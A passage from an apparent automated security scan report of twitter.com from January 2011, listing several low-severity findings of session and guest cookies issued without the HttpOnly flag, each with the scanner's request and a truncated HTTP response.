HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910353-67452-11698
ETag: "df882b3b65e14ceab1da2b4db264ec52"
Last-Modified: Mon, 24 Jan 2011 23:05:53 GMT
X-Runtime: 0.05261
Content-Type: text/html; charset=utf-8
Content-Length: 13694
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910352494991; path=/; expires=Mon, 31-Jan-11 23:05:52 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591035323884356; path=/; expires=Wed, 23 Feb 2011 23:05:53 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMWUxNmY3YWFiZTFkMjk3MjM1NjU1ZjBkMzliNzg5%250AMTM6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL3N0YXR1%250Acy8yOTYxOTYwMDU1MTMxNzUwNDoHaWQiJTgzNTE4ZDU1NGI3NjIwMzE0Y2Ex%250AMWIzZGQ1MThmZjFlIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIWLlGui0B--925e1e31fa9a3e0528e8a01d8e0ecb1f6fcb625d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.67. http://twitter.com/7news

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /7news

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
  • guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-40880-22216
ETag: "edad7aa55a25b6aec0246521dae3ab7a"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.01998
Content-Type: text/html; charset=utf-8
Content-Length: 53571
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.68. http://twitter.com/Ihtirametna/status/12955399590252544/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Ihtirametna/status/12955399590252544/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNtCw7gtAToHaWQiJTYwY2Q0YjYwYWE3MjQy%250AZDQ4ODkyNDY0NWUxM2UzMjI0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a3eb60c69659a4af34e599aed5ff2f06b71faec8; domain=.twitter.com; path=/
  • k=173.193.214.243.1295884960208230; path=/; expires=Mon, 31-Jan-11 16:02:40 GMT; domain=.twitter.com
  • guest_id=129588496047341904; path=/; expires=Wed, 23 Feb 2011 16:02:40 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Ihtirametna/status/12955399590252544/x22 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:02:40 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1295884960-45495-1332
Last-Modified: Mon, 24 Jan 2011 16:02:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884960208230; path=/; expires=Mon, 31-Jan-11 16:02:40 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588496047341904; path=/; expires=Wed, 23 Feb 2011 16:02:40 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNtCw7gtAToHaWQiJTYwY2Q0YjYwYWE3MjQy%250AZDQ4ODkyNDY0NWUxM2UzMjI0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a3eb60c69659a4af34e599aed5ff2f06b71faec8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

14.69. http://twitter.com/LizPW/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /LizPW/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJWRlMWQ2NzdlN2Y2ZTU0NGM4ZWEyNTMyMWY1ZTk3YzU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsID9NKui0B--e7abc610de60e62983759c4d12e8f2cf3eede5ed; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910621396653; path=/; expires=Mon, 31-Jan-11 23:10:21 GMT; domain=.twitter.com
  • guest_id=129591062196529909; path=/; expires=Wed, 23 Feb 2011 23:10:21 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LizPW/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910621-77895-31155
ETag: "c259f1b8d242bd50582934993f0c6970"
Last-Modified: Mon, 24 Jan 2011 23:10:21 GMT
X-Runtime: 0.01511
Content-Type: text/html; charset=utf-8
Content-Length: 51420
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910621396653; path=/; expires=Mon, 31-Jan-11 23:10:21 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591062196529909; path=/; expires=Wed, 23 Feb 2011 23:10:21 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWRlMWQ2NzdlN2Y2ZTU0NGM4ZWEyNTMyMWY1ZTk3YzU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsID9NKui0B--e7abc610de60e62983759c4d12e8f2cf3eede5ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.70. http://twitter.com/LizPW/status/29620929206165504

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /LizPW/status/29620929206165504

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlZjIzZWFjODQ4ZTMwNGMwZmI1ZjZiYzg5NTZmMmY3%250AOTQ6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tL0xpelBXL3N0YXR1%250Acy8yOTYyMDkyOTIwNjE2NTUwNDoHaWQiJTIzYjk5NTM3NmZiMjNlNTBiYWYw%250AZmUyZTUyM2MyNjFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISqJKui0B--b7721b8e7b4f79835b43a20e0bb17f7502fe2043; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910608056839; path=/; expires=Mon, 31-Jan-11 23:10:08 GMT; domain=.twitter.com
  • guest_id=129591060947951191; path=/; expires=Wed, 23 Feb 2011 23:10:09 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LizPW/status/29620929206165504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910609-55052-61887
ETag: "f0d14c8ffca948984521cadb8828dc45"
Last-Modified: Mon, 24 Jan 2011 23:10:09 GMT
X-Runtime: 0.10628
Content-Type: text/html; charset=utf-8
Content-Length: 13847
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910608056839; path=/; expires=Mon, 31-Jan-11 23:10:08 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591060947951191; path=/; expires=Wed, 23 Feb 2011 23:10:09 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlZjIzZWFjODQ4ZTMwNGMwZmI1ZjZiYzg5NTZmMmY3%250AOTQ6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tL0xpelBXL3N0YXR1%250Acy8yOTYyMDkyOTIwNjE2NTUwNDoHaWQiJTIzYjk5NTM3NmZiMjNlNTBiYWYw%250AZmUyZTUyM2MyNjFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISqJKui0B--b7721b8e7b4f79835b43a20e0bb17f7502fe2043; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.71. http://twitter.com/amazon/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /amazon/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJY%252Fw7gtAToHaWQiJWQxZTA1OTI4NWVjMGQw%250ANGM1YzFiYTU4NzYwYjJjZTVhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--51fd18caf68e4e25e41e8fafad032025c5b7a2ed; domain=.twitter.com; path=/
  • k=173.193.214.243.1295884959190770; path=/; expires=Mon, 31-Jan-11 16:02:39 GMT; domain=.twitter.com
  • guest_id=129588495963544389; path=/; expires=Wed, 23 Feb 2011 16:02:39 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amazon/x22 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:02:39 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1295884959-8967-51873
Last-Modified: Mon, 24 Jan 2011 16:02:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884959190770; path=/; expires=Mon, 31-Jan-11 16:02:39 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588495963544389; path=/; expires=Wed, 23 Feb 2011 16:02:39 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJY%252Fw7gtAToHaWQiJWQxZTA1OTI4NWVjMGQw%250ANGM1YzFiYTU4NzYwYjJjZTVhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--51fd18caf68e4e25e41e8fafad032025c5b7a2ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

14.72. http://twitter.com/cw56

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /cw56

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
  • k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
  • guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910406-20060-45194
ETag: "ff97e4d20929a3ffbfd77d3c60c548db"
Last-Modified: Mon, 24 Jan 2011 23:06:46 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 55430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.73. http://twitter.com/datasift

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /datasift

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
  • guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964110-52502-21616
ETag: "98dfab6f65418ae81b99a43c3a15ba6b"
Last-Modified: Tue, 25 Jan 2011 14:01:50 GMT
X-Runtime: 0.41713
Content-Type: text/html; charset=utf-8
Content-Length: 46413
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.74. http://twitter.com/friendships/show.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /friendships/show.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoHaWQiJTc1MThmZDQ3MjNkMmRjNDIyYmM5MTFjMjZkOWJkZGRiIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1Xx6vS0B--32e5d478b51f542973344cd918d5a98870e5fb1c; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964074919059; path=/; expires=Tue, 01-Feb-11 14:01:14 GMT; domain=.twitter.com
  • guest_id=129596407726759378; path=/; expires=Thu, 24 Feb 2011 14:01:17 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /friendships/show.json HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Tue, 25 Jan 2011 14:01:17 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1295964077-47163-14200
X-RateLimit-Limit: 150
Last-Modified: Tue, 25 Jan 2011 14:01:17 GMT
X-RateLimit-Remaining: 149
X-Runtime: 0.01144
Content-Type: application/json; charset=utf-8
Content-Length: 81
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1295967677
Set-Cookie: k=173.193.214.243.1295964074919059; path=/; expires=Tue, 01-Feb-11 14:01:14 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596407726759378; path=/; expires=Thu, 24 Feb 2011 14:01:17 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTc1MThmZDQ3MjNkMmRjNDIyYmM5MTFjMjZkOWJkZGRiIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1Xx6vS0B--32e5d478b51f542973344cd918d5a98870e5fb1c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

{"request":"\/friendships\/show.json","error":"Could not determine source user."}

14.75. http://twitter.com/goodies/tweetbutton

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /goodies/tweetbutton

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CToMY3NyZl9pZCIlZTQ5NjQzODBhYWVkYzk2ZTk5YjBhZjc3Y2QzY2My%250AYjM6B2lkIiU1ZDJiYjViZjBmZjlhM2RiYmM3MDI4ODNjZDI3ZDY5YSIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCOHber0tAQ%253D%253D--6ec643070f608b03d4f820e3f2adac7676f7a3ca; domain=.twitter.com; path=/
  • k=173.193.214.243.1295964099762702; path=/; expires=Tue, 01-Feb-11 14:01:39 GMT; domain=.twitter.com
  • guest_id=129596410159981042; path=/; expires=Thu, 24 Feb 2011 14:01:41 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goodies/tweetbutton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964101-18603-26081
ETag: "a82d62223df18c75e7f04c910709daa8"
Last-Modified: Tue, 25 Jan 2011 14:01:41 GMT
X-Runtime: 0.06782
Content-Type: text/html; charset=utf-8
Content-Length: 16931
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964099762702; path=/; expires=Tue, 01-Feb-11 14:01:39 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596410159981042; path=/; expires=Thu, 24 Feb 2011 14:01:41 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZTQ5NjQzODBhYWVkYzk2ZTk5YjBhZjc3Y2QzY2My%250AYjM6B2lkIiU1ZDJiYjViZjBmZjlhM2RiYmM3MDI4ODNjZDI3ZDY5YSIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCOHber0tAQ%253D%253D--6ec643070f608b03d4f820e3f2adac7676f7a3ca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

14.76. http://twitter.com/joomla

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /joomla

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOo6w7gtAToHaWQiJTFmN2YyYzU0MmRhYmY4%250AZWYyNDc4ZWFmY2M4MmYwNjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--724d5a6fe81e3fe03c41751c53520bd5bc139e61; domain=.twitter.com; path=/
  • k=173.193.214.243.1295884958395114; path=/; expires=Mon, 31-Jan-11 16:02:38 GMT; domain=.twitter.com
  • guest_id=129588495844059611; path=/; expires=Wed, 23 Feb 2011 16:02:38 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295884958-68881-31789
ETag: "ae3f2c47aa619b0820a141db6a6acfae"
Last-Modified: Mon, 24 Jan 2011 16:02:38 GMT
X-Runtime: 0.01322
Content-Type: text/html; charset=utf-8
Content-Length: 53726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884958395114; path=/; expires=Mon, 31-Jan-11 16:02:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588495844059611; path=/; expires=Wed, 23 Feb 2011 16:02:38 GMT
